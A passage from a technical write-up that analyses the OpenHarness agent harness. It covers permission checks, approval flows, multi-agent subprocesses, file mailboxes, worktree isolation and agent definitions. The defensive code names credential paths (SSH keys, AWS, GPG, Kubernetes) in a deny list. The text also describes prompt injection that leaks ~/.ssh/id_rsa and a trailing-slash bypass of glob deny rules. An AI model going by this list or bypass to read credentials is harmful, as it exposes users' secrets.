    if file_path:
        for candidate in _policy_match_paths(file_path):
            for pattern in SENSITIVE_PATH_PATTERNS:
                if fnmatch.fnmatch(candidate, pattern):
                    return PermissionDecision(
                        allowed=False,
                        reason=f"Access denied: {file_path} is a sensitive credential path"
                    )
    # ... rest of evaluation ...
Why it matters: Prompt injection can trick the LLM into reading ~/.ssh/id_rsa and pasting it into a response. OpenHarness puts the sensitive-path check outside the permission mode — even FULL_AUTO can't bypass it. 10+ patterns cover SSH/AWS/GCP/Azure/GPG/Docker/K8s/its own credentials. fnmatch instead of regex keeps patterns simple (*/ wildcards), no special escaping needed.

Code example (generic)

import fnmatch
from pathlib import Path

SENSITIVE = (
    "*/.ssh/*", "*/.aws/credentials", "*/.gnupg/*",
    "*/.kube/config", "*/.azure/*", "*/.docker/config.json",
)

def is_sensitive_path(path: str) -> bool:
    # Match against both "dir" and "dir/" to catch directory roots
    normalized = path.rstrip("/")
    candidates = (normalized, normalized + "/")
    return any(fnmatch.fnmatch(c, pat) for c in candidates for pat in SENSITIVE)

def check_permission(path, mode):
    if is_sensitive_path(path):
        return {"allowed": False, "reason": f"{path} is sensitive"}
    # ... other checks by mode ...
Pros
  • Defence-in-depth against prompt injection
  • Cannot be bypassed by mode / config
  • Standard well-known credential paths
  • fnmatch patterns — easy to audit
Cons
  • Hardcoded list: needs updating when new cloud providers appear
  • Does not cover custom credential locations (~/.company-secrets/)
  • False positives: legitimate debugging of ~/.ssh/config is blocked
  • Does not protect Windows-style paths (%USERPROFILE%\.ssh\)
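One way to narrow the Windows gap noted above is to normalize path separators before matching. A minimal sketch; the `is_sensitive_portable` helper is hypothetical and not part of the repo:

```python
import fnmatch

SENSITIVE = ("*/.ssh/*", "*/.aws/credentials", "*/.gnupg/*")

def is_sensitive_portable(path: str) -> bool:
    # Hypothetical extension: unify Windows backslashes so the same
    # forward-slash globs also catch C:\Users\x\.ssh\id_rsa.
    unified = path.replace("\\", "/").rstrip("/")
    candidates = (unified, unified + "/")
    return any(fnmatch.fnmatch(c, pat) for c in candidates for pat in SENSITIVE)
```

This keeps a single glob list for both platforms at the cost of one string pass per check.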

→ Deep dive T19: Built-in sensitive path protection (hardcoded glob)

T20. 6-layer hierarchical permission evaluation + path normalization

E.3
File: src/openharness/permissions/checker.py · Hàm: evaluate() · Lines: 75–169

Code from OpenHarness

def evaluate(self, tool_name, *, is_read_only, file_path=None, command=None):
    # Layer 1: sensitive path protection (see T19)
    if file_path:
        for candidate in _policy_match_paths(file_path):
            for pattern in SENSITIVE_PATH_PATTERNS:
                if fnmatch.fnmatch(candidate, pattern):
                    return PermissionDecision(allowed=False, reason="sensitive")

    # Layer 2: explicit tool deny list
    if tool_name in self._settings.denied_tools:
        return PermissionDecision(allowed=False, reason=f"{tool_name} is explicitly denied")

    # Layer 3: explicit tool allow list
    if tool_name in self._settings.allowed_tools:
        return PermissionDecision(allowed=True, reason=f"{tool_name} is explicitly allowed")

    # Layer 4: path rules (glob-based)
    if file_path and self._path_rules:
        for candidate in _policy_match_paths(file_path):
            for rule in self._path_rules:
                if fnmatch.fnmatch(candidate, rule.pattern):
                    if not rule.allow:
                        return PermissionDecision(allowed=False, reason=f"deny rule: {rule.pattern}")

    # Layer 5: command deny patterns (bash-specific)
    if command:
        for pattern in getattr(self._settings, "denied_commands", []):
            if isinstance(pattern, str) and fnmatch.fnmatch(command, pattern):
                return PermissionDecision(allowed=False, reason=f"cmd deny: {pattern}")

    # Layer 6: fall back to mode (FULL_AUTO / PLAN / DEFAULT)
    if self._settings.mode == PermissionMode.FULL_AUTO:
        return PermissionDecision(allowed=True)
    if is_read_only:
        return PermissionDecision(allowed=True)
    if self._settings.mode == PermissionMode.PLAN:
        return PermissionDecision(allowed=False, reason="plan blocks mutations")
    return PermissionDecision(allowed=False, requires_confirmation=True)


def _policy_match_paths(file_path: str) -> tuple[str, ...]:
    """Return path forms that should participate in policy matching.

    Appending a trailing slash lets glob-style deny patterns like
    ``*/.ssh/*`` and ``/etc/*`` match the directory root itself.
    """
    normalized = file_path.rstrip("/")
    if not normalized:
        return (file_path,)
    return (normalized, normalized + "/")
Why it matters: The six layers are ordered by priority: sensitive > deny > allow > path rules > command deny > mode. Sensitive always wins; no configuration can override it. The subtle part is _policy_match_paths: it returns both "/home/x/.ssh" and "/home/x/.ssh/". A glob tool may pass a path without a trailing slash, and the pattern "*/.ssh/*" will not match that bare form; without normalization, the check could be bypassed. This is the classic hole that Adversa published against Claude Code's deny rules.

Code example (generic)

import fnmatch

def evaluate_perm(tool, *, path=None, cmd=None, settings, mode):
    # Layer 1: sensitive paths (hardcoded)
    if path and is_sensitive(path):
        return deny("sensitive")
    # Layer 2: tool deny list
    if tool in settings.denied_tools:
        return deny("tool denied")
    # Layer 3: tool allow list
    if tool in settings.allowed_tools:
        return allow("tool allowed")
    # Layer 4: path rules
    if path and (r := match_path_rule(path, settings.path_rules)):
        if not r.allow:
            return deny(f"path rule: {r.pattern}")
    # Layer 5: command deny
    if cmd and any(fnmatch.fnmatch(cmd, p) for p in settings.denied_commands):
        return deny("command deny")
    # Layer 6: mode
    return mode_decision(mode, tool.is_read_only)
Pros
  • Clear hierarchy: easy to audit why a tool was allowed or denied
  • Path normalization prevents the trailing-slash bypass
  • Each layer carries its own reason for logging
  • Sensitive path check runs first and cannot be overridden
Cons
  • Six layers are complex; users find the behavior hard to predict
  • Layer 3 (allow) overrides layer 4 (path rules), which is counter-intuitive
  • No conflict detection between allow/deny rules with the same pattern
  • Bash argument parsing is less sophisticated than opencode's tree-sitter approach
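The trailing-slash bypass that `_policy_match_paths` closes is easy to reproduce with nothing but the stdlib; this snippet just demonstrates fnmatch's behavior and is not repo code:

```python
import fnmatch

# "*/.ssh/*" needs at least the slash after ".ssh", so the bare
# directory path slips past the deny pattern...
assert fnmatch.fnmatch("/home/x/.ssh", "*/.ssh/*") is False

# ...while the slash-suffixed form produced by normalization is caught
# (the trailing "*" happily matches the empty string).
assert fnmatch.fnmatch("/home/x/.ssh/", "*/.ssh/*") is True
```

This is exactly why the checker matches both path forms instead of the raw input.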

→ Deep dive T20: 6-layer hierarchical permission evaluation + path normalization

T21. Async interactive approval with UUID + 300s timeout + lock

E.4
File: src/openharness/ui/backend_host.py · Lines: 684–706 · Timeout: 300s · Lock: _permission_lock

Code from OpenHarness

import asyncio
import uuid
from dataclasses import dataclass

@dataclass
class PendingApproval:
    request_id: str
    tool_name: str
    tool_input: dict
    future: asyncio.Future[PermissionResolution]

class BackendHost:
    def __init__(self):
        self._pending_approvals: dict[str, PendingApproval] = {}
        self._permission_lock = asyncio.Lock()

    async def request_approval(self, tool_name, tool_input, *, timeout=300.0):
        async with self._permission_lock:  # only one approval at a time
            request_id = str(uuid.uuid4())
            fut: asyncio.Future[PermissionResolution] = asyncio.get_running_loop().create_future()
            self._pending_approvals[request_id] = PendingApproval(
                request_id=request_id,
                tool_name=tool_name,
                tool_input=tool_input,
                future=fut,
            )
            # Emit event to UI with request_id; UI sends back resolve_approval() later
            await self._emit(ApprovalRequestEvent(
                request_id=request_id,
                tool_name=tool_name,
                tool_input=tool_input,
            ))
            try:
                return await asyncio.wait_for(fut, timeout=timeout)
            except asyncio.TimeoutError:
                return PermissionResolution(approved=False, reason="timeout")
            finally:
                self._pending_approvals.pop(request_id, None)

    def resolve_approval(self, request_id: str, approved: bool, remember: bool = False):
        # Called from UI when user clicks Allow/Deny
        pending = self._pending_approvals.get(request_id)
        if pending is not None and not pending.future.done():
            pending.future.set_result(PermissionResolution(approved=approved, remember=remember))
Why it matters: The UI and the engine run async in two different "threads" of control, so they need a sync mechanism. The Future is the bridge: the engine awaits fut, the UI calls fut.set_result(...). A UUID uniquely tags each approval, making it race-safe when multiple tool calls are concurrent. _permission_lock ensures only one approval dialog shows at a time (UX). The 300s timeout guards against the user walking away. Cleanup in finally avoids a memory leak.

Code example (generic)

import asyncio
import uuid

class ApprovalHost:
    def __init__(self):
        self.pending = {}
        self.lock = asyncio.Lock()

    async def ask(self, payload, timeout=300) -> bool:
        async with self.lock:
            rid = str(uuid.uuid4())
            fut = asyncio.get_running_loop().create_future()
            self.pending[rid] = fut
            await self.notify_ui({"id": rid, "payload": payload})
            try:
                return await asyncio.wait_for(fut, timeout)
            except asyncio.TimeoutError:
                return False
            finally:
                self.pending.pop(rid, None)

    def resolve(self, rid: str, approved: bool):
        if (fut := self.pending.get(rid)) and not fut.done():
            fut.set_result(approved)
Pros
  • Async-native: does not block the event loop
  • UUID prevents races between multiple pending tool calls
  • Lock preserves the "one dialog at a time" UX
  • Timeout prevents stuck sessions
Cons
  • The lock serializes approvals, increasing latency for multiple tool calls
  • The 300s timeout can be too short when the user is busy
  • No "remember always" semantics here (handled in another layer)
  • Futures can leak if a ghost UI never resolves them
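The ghost-UI leak in the cons list can be mitigated with a periodic sweep that cancels stale futures. A sketch under the assumption that pending futures are tracked with a creation timestamp; the repo itself relies on wait_for's timeout:

```python
import asyncio
import time

class ApprovalRegistry:
    """Hypothetical mitigation: remember when each approval future was
    created so a sweep can cancel entries a ghost UI will never resolve."""

    def __init__(self):
        self.pending: dict[str, tuple[asyncio.Future, float]] = {}

    def add(self, rid: str, fut: asyncio.Future):
        self.pending[rid] = (fut, time.monotonic())

    def sweep(self, max_age: float):
        now = time.monotonic()
        for rid, (fut, born) in list(self.pending.items()):
            if now - born >= max_age and not fut.done():
                fut.cancel()  # wakes any awaiter with CancelledError
                self.pending.pop(rid)

async def demo() -> bool:
    reg = ApprovalRegistry()
    fut = asyncio.get_running_loop().create_future()
    reg.add("abc", fut)
    reg.sweep(max_age=0.0)  # treat everything as stale immediately
    return fut.cancelled()
```

A background task calling sweep() every minute would bound the registry size even if the UI disappears.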

→ Deep dive T21: Async interactive approval with UUID + 300s timeout + lock

F. Multi-Agent Swarm: 5 techniques · UNIQUE vs opencode

This is where OpenHarness diverges completely from opencode. opencode only has a sub-agent Task tool running in-session (spawning a child "capability" inside the same process). OpenHarness has agent organization: each agent is one subprocess with its own inbox, its own worktree, and permission sync over files. It scales from an "agent pair" (leader + worker) to an "agent team" (coordinator + N workers).

T22. Subprocess-based subagent spawning

F.1
File: src/openharness/swarm/subprocess_backend.py · Lines: 28–103 · Manager: BackgroundTaskManager · API: create_agent_task()

Code from OpenHarness

import asyncio
import os
import sys
import uuid
from pathlib import Path

class SubprocessAgent:
    def __init__(self, agent_id: str, definition: AgentDefinition, team_dir: Path, worktree: Path | None):
        self.agent_id = agent_id
        self.definition = definition
        self.team_dir = team_dir  # shared team state
        self.worktree = worktree  # git worktree for isolation
        self.proc: asyncio.subprocess.Process | None = None

    async def spawn(self):
        # Build CLI args — forward relevant flags from parent
        cmd = [
            sys.executable, "-m", "openharness", "run-agent",
            "--agent-id", self.agent_id,
            "--team-dir", str(self.team_dir),
            "--model", self.definition.model,
            "--effort", self.definition.effort,
            "--permission-mode", self.definition.permission_mode.value,
        ]
        if self.definition.max_turns is not None:
            cmd += ["--max-turns", str(self.definition.max_turns)]
        cwd = str(self.worktree) if self.worktree else None
        # Inherit env but add OPENHARNESS_SWARM_AGENT_ID
        env = os.environ.copy()
        env["OPENHARNESS_SWARM_AGENT_ID"] = self.agent_id
        env["OPENHARNESS_SWARM_TEAM_DIR"] = str(self.team_dir)
        self.proc = await asyncio.create_subprocess_exec(
            *cmd,
            cwd=cwd,
            env=env,
            stdin=asyncio.subprocess.DEVNULL,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
        log.info("spawned subagent pid=%s id=%s", self.proc.pid, self.agent_id)

class BackgroundTaskManager:
    """Registry of running subagents; support list/kill/wait."""

    def __init__(self):
        self._agents: dict[str, SubprocessAgent] = {}

    async def create_agent_task(self, definition: AgentDefinition, *, worktree=None) -> str:
        agent_id = f"task-{uuid.uuid4().hex[:8]}"
        agent = SubprocessAgent(agent_id, definition, self.team_dir, worktree)
        await agent.spawn()
        self._agents[agent_id] = agent
        return agent_id
Why it matters: Each agent is an independent process, which gives (1) fault isolation: one agent crashing does not take down the whole team; (2) real CPU parallelism: the Python GIL does not block across processes; (3) permission scope: each process gets its own mode, its own model, its own turn limit; (4) worktree isolation: it can run with cwd set to a different worktree and edit a different branch. The trade-off: spawn overhead (~500ms-1s) and no shared memory, so IPC is required (see T23, mailbox).

Code example (generic)

import asyncio
import os
import sys

class SubprocessAgent:
    def __init__(self, agent_id, model, team_dir, cwd=None):
        self.agent_id = agent_id
        self.model = model
        self.team_dir = team_dir
        self.cwd = cwd

    async def spawn(self):
        cmd = [
            sys.executable, "-m", "myagent", "worker",
            "--id", self.agent_id,
            "--model", self.model,
            "--team-dir", self.team_dir,
        ]
        env = {**os.environ, "AGENT_ID": self.agent_id}
        self.proc = await asyncio.create_subprocess_exec(
            *cmd,
            cwd=self.cwd,
            env=env,
            stdin=asyncio.subprocess.DEVNULL,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
        return self.proc.pid
Pros
  • Fault isolation: one agent dying does not take down the team
  • True CPU parallelism (not limited by the GIL)
  • Per-agent permission/model scope
  • Clean shutdown via subprocess signaling
Cons
  • Spawn overhead of 500ms-1s per agent
  • No shared in-memory cache, so extra I/O overhead
  • IPC over the filesystem adds latency
  • Harder to debug than a single process (stderr is separate)
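A manager that spawns subprocess agents also has to reap them; here is a minimal sketch of the wait-with-timeout-then-kill side. The `run_and_reap` helper is illustrative, not the repo's BackgroundTaskManager API:

```python
import asyncio
import sys

async def run_and_reap(cmd: list[str], timeout: float = 10.0) -> tuple[int, str]:
    """Spawn a worker, wait up to `timeout`, kill it if it hangs."""
    proc = await asyncio.create_subprocess_exec(
        *cmd,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
    )
    try:
        out, _ = await asyncio.wait_for(proc.communicate(), timeout=timeout)
    except asyncio.TimeoutError:
        proc.kill()        # escalate: the agent is stuck
        await proc.wait()  # reap to avoid a zombie
        return (-1, "")
    return (proc.returncode, out.decode())

# Example: a trivial "agent" that prints one line and exits cleanly
rc, out = asyncio.run(run_and_reap([sys.executable, "-c", "print('done')"]))
```

Without the `await proc.wait()` after kill, the dead child would linger as a zombie until the parent exits.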

T23. File-based async mailbox with atomic writes

F.2
File: src/openharness/swarm/mailbox.py · Lines: 1–95 · Layout: ~/.openharness/teams/<team>/agents/<id>/inbox/

Code from OpenHarness

import asyncio
import json
import os
import time
import uuid
from pathlib import Path

class Mailbox:
    """File-based inbox for a single agent.

    Layout: inbox/
        <sort_key>-<uuid>.tmp   ← being written (atomic)
        <sort_key>-<uuid>.json  ← delivered (consumable)
    """

    def __init__(self, agent_dir: Path):
        self.inbox = agent_dir / "inbox"
        self.inbox.mkdir(parents=True, exist_ok=True)

    def send(self, envelope: dict):
        """Atomic write: write .tmp then rename to .json."""
        sort_key = f"{time.time_ns():020d}"  # nanosecond for ordering
        msg_id = uuid.uuid4().hex[:8]
        base = self.inbox / f"{sort_key}-{msg_id}"
        tmp = base.with_suffix(".tmp")
        final = base.with_suffix(".json")
        tmp.write_text(json.dumps(envelope, ensure_ascii=False))
        os.rename(tmp, final)  # atomic on POSIX

    async def poll(self, interval=0.25):
        """Yield envelopes as they arrive. Caller deletes after consume."""
        while True:
            for msg_path in sorted(self.inbox.glob("*.json")):
                try:
                    envelope = json.loads(msg_path.read_text())
                except json.JSONDecodeError:
                    continue  # partial write? skip
                yield envelope
                msg_path.unlink(missing_ok=True)
            await asyncio.sleep(interval)

# Envelope types (message kinds)
# {"kind": "user_message", "text": "..."}
# {"kind": "permission_request", "request_id": "...", "tool": "...", "args": {...}}
# {"kind": "shutdown", "reason": "..."}
# {"kind": "tool_result", "tool": "...", "result": ..., "is_error": bool}
Why it matters: A filesystem mailbox is zero-infra IPC. The atomic write (.tmp → rename) guarantees a reader never sees a partial file, since rename is atomic on POSIX. The nanosecond sort key guarantees delivery order. A plain poll loop (no fsnotify needed) with a 250ms latency is acceptable. The envelope kind enum enables message-kind routing in the consumer. No Redis/RabbitMQ/Kafka required, and it scales comfortably to ~10 agents.

Code example (generic)

import asyncio
import json
import os
import time
import uuid
from pathlib import Path

class FileMailbox:
    def __init__(self, inbox: Path):
        self.inbox = inbox
        inbox.mkdir(parents=True, exist_ok=True)

    def send(self, msg: dict):
        sort_key = f"{time.time_ns():020d}"
        mid = uuid.uuid4().hex[:8]
        tmp = self.inbox / f"{sort_key}-{mid}.tmp"
        final = self.inbox / f"{sort_key}-{mid}.json"
        tmp.write_text(json.dumps(msg))
        os.rename(tmp, final)  # atomic

    async def receive(self):
        while True:
            for p in sorted(self.inbox.glob("*.json")):
                msg = json.loads(p.read_text())
                p.unlink()
                yield msg
            await asyncio.sleep(0.25)
Pros
  • Zero infrastructure (no message broker required)
  • Atomic rename: no partial reads
  • FIFO ordering via the nanosecond sort key
  • Inspectable with filesystem tools (ls, cat)
Cons
  • The 250ms poll interval sets a latency floor
  • The filesystem becomes a bottleneck with many agents
  • No cross-machine delivery (no remote transport)
  • Needs stale-message cleanup if the reader crashes
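The stale-message problem in the cons list calls for a small janitor; a sketch assuming mtime-based TTLs (`sweep_stale` is hypothetical, not part of the repo's Mailbox):

```python
import time
from pathlib import Path

def sweep_stale(inbox: Path, ttl_seconds: float = 3600.0) -> int:
    """Delete leftover .tmp files (writer crashed mid-send) and .json
    messages older than the TTL (reader crashed). Returns count removed."""
    removed = 0
    now = time.time()
    for p in list(inbox.glob("*.tmp")) + list(inbox.glob("*.json")):
        if now - p.stat().st_mtime >= ttl_seconds:
            p.unlink(missing_ok=True)
            removed += 1
    return removed
```

Run from a cron-style loop, this bounds inbox growth even when a consumer dies mid-session.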

T24. Dual-channel permission sync protocol

F.3
File: src/openharness/swarm/permission_sync.py · Channels: file (pending/ + resolved/) + mailbox

Code from OpenHarness

import asyncio
import json
import os
import time
import uuid
from pathlib import Path

class PermissionSync:
    """Worker writes pending request; Leader resolves by writing resolution."""

    def __init__(self, team_dir: Path, agent_id: str):
        self.pending_dir = team_dir / "permissions" / "pending"
        self.resolved_dir = team_dir / "permissions" / "resolved"
        self.pending_dir.mkdir(parents=True, exist_ok=True)
        self.resolved_dir.mkdir(parents=True, exist_ok=True)
        self.agent_id = agent_id

    async def worker_request(self, tool: str, tool_input: dict, *, timeout=300):
        """Called by worker: write pending request; wait for resolution file."""
        request_id = uuid.uuid4().hex
        # Fast-path: read-only tools auto-approved without leader involvement
        if _is_read_only_heuristic(tool, tool_input):
            return PermissionResolution(approved=True, reason="read-only")
        pending_file = self.pending_dir / f"{request_id}.json"
        resolved_file = self.resolved_dir / f"{request_id}.json"
        pending_file.write_text(json.dumps({
            "request_id": request_id,
            "agent_id": self.agent_id,
            "tool": tool,
            "tool_input": tool_input,
            "ts": time.time(),
        }))
        # Also send notification via mailbox for low-latency wake-up
        await self._notify_leader_via_mailbox(request_id)
        # Poll for resolution
        deadline = time.time() + timeout
        while time.time() < deadline:
            if resolved_file.exists():
                data = json.loads(resolved_file.read_text())
                pending_file.unlink(missing_ok=True)
                resolved_file.unlink(missing_ok=True)
                return PermissionResolution(**data)
            await asyncio.sleep(0.25)
        return PermissionResolution(approved=False, reason="timeout")

    def leader_resolve(self, request_id: str, approved: bool, *, reason=""):
        """Called by leader (main UI) when user approves/denies."""
        resolved_file = self.resolved_dir / f"{request_id}.json"
        tmp = resolved_file.with_suffix(".tmp")
        tmp.write_text(json.dumps({"approved": approved, "reason": reason}))
        os.rename(tmp, resolved_file)
Why it matters: The worker (subprocess) needs approval from the leader (main CLI) but shares no memory with it. Dual channel: (1) files, which are persistent, auditable, and survive a crash; (2) the mailbox, a low-latency wake-up signal so polling does not have to be tight. The read-only heuristic auto-approves to reduce leader load. The sync pattern is a clean separation: the worker blocks on polling while the leader does a non-blocking resolution write.

Code example (generic)

import asyncio
import json
import os
import time
import uuid

class PermSync:
    def __init__(self, pending_dir, resolved_dir):
        self.p = pending_dir
        self.r = resolved_dir

    async def worker_wait(self, tool, args, timeout=300):
        rid = uuid.uuid4().hex
        (self.p / f"{rid}.json").write_text(json.dumps({"tool": tool, "args": args}))
        resolved = self.r / f"{rid}.json"
        deadline = time.time() + timeout
        while time.time() < deadline:
            if resolved.exists():
                data = json.loads(resolved.read_text())
                resolved.unlink()
                return data["approved"]
            await asyncio.sleep(0.25)
        return False

    def leader_resolve(self, rid, approved):
        tmp = self.r / f"{rid}.tmp"
        tmp.write_text(json.dumps({"approved": approved}))
        os.rename(tmp, self.r / f"{rid}.json")
Pros
  • Persistent and auditable: crash-resilient
  • Dual channel (files for persistence, mailbox for latency)
  • Read-only heuristic reduces leader load
  • Atomic rename on the leader side
Cons
  • The 250ms poll loop sets a floor: not real-time
  • Stale pending files remain if the worker crashes
  • The "read-only" heuristic can miss cases
  • No request priority or queueing
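What the read-only fast-path might look like: the exact rules of the repo's `_is_read_only_heuristic` are not shown, so this is an assumed, deliberately conservative version where unknown tools fail safe as mutating:

```python
READ_ONLY_TOOLS = {"Read", "Grep", "Glob", "WebFetch"}

def is_read_only_heuristic(tool: str, tool_input: dict) -> bool:
    """Conservative guess (assumption, not repo code): only allowlisted
    tools and a tiny set of obviously read-only shell commands pass."""
    if tool in READ_ONLY_TOOLS:
        return True
    if tool == "Bash":
        cmd = str(tool_input.get("command", "")).strip()
        first = cmd.split(" ", 1)[0] if cmd else ""
        # No redirects, and only commands that cannot mutate the tree
        return first in {"ls", "cat", "pwd"} and ">" not in cmd
    return False
```

Erring toward False only costs an extra round-trip to the leader; erring toward True would silently skip a permission check.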

T25. Git worktree isolation per agent

F.4
File: src/openharness/swarm/worktree.py · Lines: 1–80 · Slug: max 64 chars, [a-zA-Z0-9._-]

Code from OpenHarness

import asyncio
import re
from pathlib import Path

SLUG_RE = re.compile(r"^[a-zA-Z0-9._-]+$")
MAX_SLUG_LEN = 64

def validate_slug(slug: str) -> str:
    """Reject .., absolute paths, and control chars."""
    if not slug or len(slug) > MAX_SLUG_LEN:
        raise ValueError(f"slug length must be 1..{MAX_SLUG_LEN}")
    if not SLUG_RE.match(slug):
        raise ValueError(f"invalid slug: {slug!r}")
    if ".." in slug or slug.startswith(("/", "-")):
        raise ValueError(f"slug must not traverse or start with /-: {slug!r}")
    return slug

async def create_worktree(repo_root: Path, slug: str, *, base_ref: str = "HEAD") -> Path:
    """Create a shallow worktree for subagent isolation."""
    slug = validate_slug(slug)
    worktree_path = repo_root / ".openharness" / "worktrees" / slug
    branch = f"openharness/swarm/{slug}"
    # Reuse existing worktree if slug already exists
    if worktree_path.exists():
        return worktree_path
    worktree_path.parent.mkdir(parents=True, exist_ok=True)
    cmd = ["git", "-C", str(repo_root), "worktree", "add", "--quiet",
           "-b", branch, str(worktree_path), base_ref]
    proc = await asyncio.create_subprocess_exec(
        *cmd,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
    )
    _, stderr = await proc.communicate()
    if proc.returncode != 0:
        raise RuntimeError(f"git worktree add failed: {stderr.decode()}")
    return worktree_path

async def remove_worktree(repo_root: Path, slug: str, *, force: bool = False):
    """Remove a worktree; orphan branch left as cleanup-later."""
    slug = validate_slug(slug)
    worktree_path = repo_root / ".openharness" / "worktrees" / slug
    args = ["git", "-C", str(repo_root), "worktree", "remove", str(worktree_path)]
    if force:
        args.append("--force")
    ...
Why it matters: Two agents editing the same repo files means merge conflicts and race conditions. A worktree lets each agent run on its own branch with its own checkout while still sharing the .git object database (disk-efficient). Once an agent finishes, its branch is merged back to main. Slug validation blocks path traversal (..), which matters when the slug originates from LLM input. The openharness/swarm/ branch prefix makes cleanup easy and avoids collisions with dev branches.

Code example (generic)

import asyncio
import re
from pathlib import Path

SLUG_RE = re.compile(r"^[a-zA-Z0-9._-]{1,64}$")

async def make_worktree(repo: Path, slug: str, base="HEAD") -> Path:
    if not SLUG_RE.match(slug) or ".." in slug:
        raise ValueError("bad slug")
    wt = repo / ".worktrees" / slug
    if wt.exists():
        return wt
    branch = f"agent/{slug}"
    proc = await asyncio.create_subprocess_exec(
        "git", "-C", str(repo), "worktree", "add", "-b", branch, str(wt), base,
        stdout=asyncio.subprocess.DEVNULL,
        stderr=asyncio.subprocess.PIPE,
    )
    _, err = await proc.communicate()
    if proc.returncode != 0:
        raise RuntimeError(err.decode())
    return wt
Pros
  • True file isolation: each agent gets its own checkout
  • Shares .git objects, so disk-efficient
  • Each branch experiments independently
  • Slug validation prevents path traversal
Cons
  • Git worktree overhead of ~100-500ms per spawn
  • Manual cleanup after an agent crash leaves orphan branches
  • Does not work cleanly with submodules and LFS
  • Disk usage multiplies when the working tree is large
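Since slugs often originate from LLM output, it can help to sanitize before validating rather than reject outright. A sketch; `slugify` is a hypothetical helper layered in front of the repo's validate_slug:

```python
import re

MAX_SLUG_LEN = 64
_INVALID = re.compile(r"[^a-zA-Z0-9._-]+")

def slugify(title: str) -> str:
    """Turn an arbitrary task title into something that passes the
    validator's rules: charset [a-zA-Z0-9._-], max 64 chars, no '..'
    traversal, no leading '/' or '-'."""
    s = _INVALID.sub("-", title.strip())
    s = re.sub(r"\.\.+", ".", s)  # collapse ".." so it cannot traverse
    s = s.strip("-.")             # no leading '-' (flag-like) or '.'
    return s[:MAX_SLUG_LEN].rstrip("-.") or "task"
```

The fallback "task" guarantees a non-empty result even for fully non-ASCII titles.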

T26. YAML agent definitions + coordinator dispatch

F.5
File: src/openharness/coordinator/agent_definitions.py · Load: .openharness/agents/*.yaml

Code from OpenHarness

import yaml
from pathlib import Path
from pydantic import BaseModel
from openharness.permissions.modes import PermissionMode

class AgentDefinition(BaseModel):
    name: str
    description: str
    system_prompt: str
    tools: list[str] = []             # allowlist (empty = all)
    disallowed_tools: list[str] = []  # denylist
    model: str = "claude-sonnet-4-6"
    effort: str = "medium"            # low/medium/high
    permission_mode: PermissionMode = PermissionMode.DEFAULT
    max_turns: int | None = 50
    color: str = "cyan"
    isolation: str = "none"           # "none" | "worktree"

def load_agent_definitions(cwd: Path) -> dict[str, AgentDefinition]:
    defs = {}
    for location in [
        cwd / ".openharness" / "agents",
        Path.home() / ".openharness" / "agents",
    ]:
        if not location.is_dir():
            continue
        for f in sorted(location.glob("*.yaml")):
            data = yaml.safe_load(f.read_text())
            for entry in (data if isinstance(data, list) else [data]):
                defn = AgentDefinition(**entry)
                defs[defn.name] = defn
    return defs

# Example agent definition YAML:
# name: doc-writer
# description: Writes technical documentation
# system_prompt: |
#   You are a doc writer. Focus on clarity, accuracy, and structure.
# tools: [Read, Write, Grep, Glob]
# permission_mode: plan   # cannot mutate
# max_turns: 30
# isolation: worktree     # get own worktree

class Coordinator:
    """Central router: decide which agent handles an incoming task."""

    def __init__(self, definitions: dict[str, AgentDefinition]):
        self.definitions = definitions
        self.manager = BackgroundTaskManager()

    async def dispatch(self, task_description: str, preferred_agent: str | None = None):
        defn = self.definitions.get(preferred_agent) or self._pick_agent(task_description)
        worktree = await create_worktree(...) if defn.isolation == "worktree" else None
        return await self.manager.create_agent_task(defn, worktree=worktree)
Why it matters: Declarative agent definitions are easy to version control, review, and share. The Coordinator is a central dispatcher: it reads the task description, picks a suitable agent (or honors the preferred_agent name hint), and spawns it with the matching config. isolation: worktree activates T25 (git worktree). Per-agent permission mode means one agent can run in plan mode (research only) while another runs full_auto (background CI worker). Very similar to the Claude Code subagents pattern.

Code example (generic)

import yaml
from pathlib import Path
from pydantic import BaseModel

class AgentDef(BaseModel):
    name: str
    description: str
    system_prompt: str
    tools: list[str] = []
    model: str = "claude-sonnet-4-6"
    max_turns: int = 50
    isolation: str = "none"

def load_defs(dir: Path) -> dict[str, AgentDef]:
    out = {}
    for f in sorted(dir.glob("*.yaml")):
        d = yaml.safe_load(f.read_text())
        for entry in (d if isinstance(d, list) else [d]):
            defn = AgentDef(**entry)
            out[defn.name] = defn
    return out

class Coordinator:
    async def dispatch(self, task: str, agent_name: str):
        defn = self.defs[agent_name]
        wt = await make_worktree(repo, agent_name) if defn.isolation == "worktree" else None
        return await self.spawn(defn, wt, task)
Pros
  • Declarative: YAML is git-friendly
  • Agents can be shared across a team (committed to the repo)
  • Per-agent tools, mode, and model
  • Coordinator routing is easy to extend
Cons
  • The agent-selection heuristic is unclear and can pick the wrong agent
  • YAML is prone to indentation mistakes, with no early schema warning
  • No version/compat field on definitions
  • Agent chains (A → B → C) are not first-class
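The repo's `_pick_agent` logic is not shown, so here is one plausible selection strategy as an assumption: naive keyword overlap between the task text and each agent's description:

```python
def pick_agent(task: str, definitions: dict) -> str:
    """Score each agent by word overlap with the task; highest wins.
    (Assumed strategy for illustration, not the repo's actual logic.)"""
    task_words = set(task.lower().split())
    best_name, best_score = None, -1
    for name, defn in definitions.items():
        desc_words = set(defn["description"].lower().split())
        score = len(task_words & desc_words)
        if score > best_score:
            best_name, best_score = name, score
    return best_name

defs = {
    "doc-writer": {"description": "writes technical documentation"},
    "bug-fixer": {"description": "fixes bugs in python code"},
}
```

Anything smarter (embeddings, an LLM router call) slots into the same dispatch seam without changing the Coordinator interface.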

G. External Integrations: 4 techniques · mostly NEW vs opencode

Unlike opencode (CLI-only), OpenHarness extends the agent beyond the terminal: channels (Slack/Feishu/Discord/Telegram/Matrix), LSP via the Python AST, a Docker sandbox for tool execution, and a cron scheduler for background tasks. It turns the agent into an "always-on service" instead of a "tool running inside an editor".

T27. Multi-channel bus (Slack/Feishu/Discord/Telegram/Matrix)

G.1
File: src/openharness/channels/bus/queue.py · src/openharness/channels/impl/* · Core: MessageBus with two asyncio.Queues (inbound/outbound)

Code from OpenHarness

import asyncio
from dataclasses import dataclass

@dataclass
class ChannelMessage:
    channel: str    # "slack" | "feishu" | "discord" | ...
    source_id: str  # channel-specific thread / room
    user: str
    text: str
    raw: dict       # original adapter payload

class MessageBus:
